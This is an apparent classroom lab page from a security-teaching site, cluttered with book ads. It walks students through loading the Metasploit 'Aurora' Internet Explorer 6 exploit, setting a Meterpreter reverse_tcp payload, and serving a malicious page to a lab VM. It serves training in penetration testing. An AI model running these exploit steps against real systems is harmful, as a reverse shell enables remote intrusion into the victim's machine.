ComputerSecurityStudent (CSS)

HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit

|Views: 1333

(Metasploit windows/browser/ms10_002_aurora)
{ How To Crash Internet Exploder 6 } Background Information
Reference Link: http://www.metasploit.com/modules/exploit/windows/browser/ms10_002_aurora http://www.microsoft.com/technet/security/advisory/979352.mspx
Metasploit Toolkit for Penetration T... David Maynor, Thom... Best Price $10.80 or Buy New $43.05

Privacy Information

Internet Explorer "Aurora" Memory Corruption This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

Prerequisite
1. Login to your Instructor VM, as username administrator For those of you that do not have access to my class, Instructor VM is a Windows XP Operating System.

2. Download Metasploit http://www.metasploit.com/download/

Penetration Tester's Open Source Too... Jeremy Faircloth, ... Best Price $21.00 or Buy New

3. Login to your WindowsVulnerable01 VM, as username student For those of you that do not have access to my class, Instructor VM is a Windows XP Operating System running Windows Explor[d]er 6.

Privacy Information

4. On WindowsVulnerable01, discover your IP Address Start --> Run --> cmd --> ipconfig

Writing Security Tools and Exploits James C. Foster, V... Best Price $7.18 or Buy New $46.50

Privacy Information

Section 1: Fire Up Metasploit Console

1. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit Console

converted by Web2PDFConvert.com

Dissecting the Hack Jayson E. Street, ... Best Price $14.50 or Buy New $18.78

Privacy Information

2. NOTE: The Metasploit Console might take some time to load When you see the below window then you know you will be ready.

SSH, The Secure Shell Daniel J. Barrett,... Best Price $16.96 or Buy New $27.26

Privacy Information

Pro OpenSSH Michael Stahnke Best Price $11.57 or Buy New $26.77

Privacy Information

Section 2: Searching for windows/browser/ms10_002_aurora

1. search aurora The above command will show all exploits related to aurora.
Implementing SSH Himanshu Dwivedi Best Price $0.01 or Buy New $35.00

Privacy Information

2. use exploit/windows/browser/ms10_002_aurora This command will tell msf which exploit to load. NOTE: Your command prompt will change.

UNIX Shells by Example Ellie Quigley Best Price $22.88 or Buy New $35.78

Privacy Information

Section 3: Setting the payload

1. show payloads The payload is the actual code that will run on the target system after a successful exploit attempt. Use the show payloads command to list all payloads compatible with the current exploit.

A Practical Guide to Linux Commands,...

converted by Web2PDFConvert.com

Mark G. Sobell Best Price $16.74 or Buy New

Privacy Information

2. set PAYLOAD windows/meterpreter/reverse_tcp

Linux Pocket Guide Daniel J. Barrett Best Price $0.90 or Buy New

Privacy Information

Section 4: Set Target IP Address and Exploit

1. set LHOST 192.168.1.108 Where 192.168.1.108 is the IP address of WindowsVulnerable01. Please refer to step 4 in the prerequisite section to obtain the IP address of WindowsVulnerable01.

Linux Administration Wale Soyinka Best Price $11.78 or Buy New $19.99

Privacy Information

2. set URIPATH exploitME.html This will be the name of the webpage file the mis-informed user with Windows Exploder 6 will click on.

3. exploit Notice how msf starts up a daemon listening on port 8080 for the victim to make a connection by click on the web address http://192.168.1.105:8080/exploitME.html NOTE: 192.168.1.105 is the IP address of the Instructor VM

Beginning Ubuntu Linux Keir Thomas, Andy ... Best Price $6.99 or Buy New $29.19

Privacy Information

4. On WindowsVulnerable01, Bring up Windows Explorer 6

Practical Guide to Fedora and Red Ha... Mark G. Sobell Best Price $2.11 or Buy New

Privacy Information

5. Place website address http://192.168.1.105:8080/exploitME.html in the address bar. Click Go or press enter in the address text box in which your address is located.

converted by Web2PDFConvert.com

Beginning the Linux Command Line Sander van Vugt Best Price $18.89 or Buy New $23.30

6. On the Instructor VM Once the browser tries to load the page, you will see a msf message saying 'Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.108.'

Privacy Information

7. Back to the WindowsVulnerable VM After your Windows Exploder tries to load the web page it will become unstable, crash, and you will see the below Microsoft Message.

Unix and Linux System Administration... Evi Nemeth, Garth ... Buy New

Privacy Information

Sun Paul Sanghera Best Price $1.97 or Buy New $35.41

Privacy Information

Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #6 in Section 4 into a word document and upload to Moodle.
Solaris Operating Environment Boot C... David Rhodes, Domi... Best Price $0.74 or Buy New

Privacy Information

AIX 5L Administration Randal K. Michael Best Price $15.20 or Buy New $36.22

Privacy Information

converted by Web2PDFConvert.com

AIX for UNIX Professionals Bonnie L. Miller Best Price $5.62 or Buy New $58.00

Privacy Information

HP-UX Asghar Ghori Best Price $46.51 or Buy New $50.52

Privacy Information

HP-UX 11i Version 2 System Administr... Marty Poniatowski Best Price $5.36 or Buy New $38.53

Privacy Information

BSD UNIX Toolbox Christopher Negus,... Buy New

Privacy Information

converted by Web2PDFConvert.com